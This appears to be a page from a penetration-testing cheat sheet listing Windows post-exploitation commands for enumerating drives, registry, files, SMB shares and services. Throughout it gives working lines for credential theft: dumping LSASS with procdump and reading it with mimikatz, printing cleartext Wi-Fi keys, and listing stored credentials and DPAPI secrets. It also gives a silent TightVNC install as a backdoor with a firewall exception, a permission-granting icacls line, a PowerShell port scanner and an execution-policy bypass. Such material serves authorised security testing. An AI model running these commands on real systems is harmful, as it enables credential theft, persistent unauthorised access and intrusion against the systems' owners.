Comment on page
Windows
get-psdrive //powershell
show_mount // meterpreter
wmic logicaldisk get name|caption //wmic
Seatbelt MappedDrives // seatbelt
reg query HKEY_LOCAL_MACHINE\SOFTWARE
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Users\<name>\AppData\Local\Packages\CanonicalGroup...
dir /a-r-d /s /b
dir /s *foo*
findstr /s /i <needle> *.*
dir c:\*.* /S /Q|FIND /i "owner"
search -f *.<ext>`
dir /s /R /a
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
Select-String -Path <path> -Pattern <pattern> | out-host -paging
smbmap -R -H \\<ip>
smbclient -L \\<ip> -N
smbclient \\<ip>\share -U <user>
smbget -R <ip>
icacls <filename> /grant <username>(OI)(CI)F /T
reg query HKLM /s | findstr /i <item>
reg query HKCU /s | findstr /i <item>
reg query HKLM /f <item> /t REG_SZ /s
reg query HKCU /f <item> /t REG_SZ /s
netsh wlan show profile <name> key=clear
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<ip>",$_)) "Port $_ is open!"} 2>$null
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"
msiexec /i "tightvnc.msi" /quiet /norestart ADDLOCAL="Server,Viewer" VIEWER_ASSOCIATE_VNC_EXTENSION=1 SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 VIEWER_ADD_FIREWALL_EXCEPTION=1 SERVER_ALLOW_SAS=1 SET_USEVNCAUTHENTICATION=1 VALUE_OF_USEVNCAUTHENTICATION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=PASSWORD SET_USECONTROLAUTHENTICATION=1 VALUE_OF_USECONTROLAUTHENTICATION=1 SET_CONTROLPASSWORD=1 VALUE_OF_CONTROLPASSWORD=PASSWORD
reg query HKLM /s /f <keyword> (try HKLM/HKCU)
forfiles /P C:\ /S /D 10/24/2020 /C "cmd /c echo @PATH"
HKLM:\Software\Policies\Microsoft\Windows\PowerShell # change value to bypass
rpcclient -U <user> <ip>
lookupnames <name>
lookupsids <sid>
procdump.exe -accepteula -ma <pid>
If we dump lsass, this dump can be read using mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Check for stored credentials:
cmdkey /list
This lead to success on numerous occasions. While not technical make sure you look at the files that are on the system. This includes configuration backups, documents, notes, technical documentation and more.
Seatbelt -group=all -full
SharpDPAPI triage
sc query
sc query <>
sc qc <>
reg query HKLM\SYSTEM\CurrentControlSet\Services
smbclient -L \\<ip> -U anonymous
Without credentials:
smbclient \\server\\sharename -U "" -N
With credentials:
smbclient \\server\\sharename -U domain\user
Usually you want to run the scripts/tools from the Privilege Escalation Section. Other than that these are interesting as well:
- Screenshot
- Keylogger
Last modified 9mo ago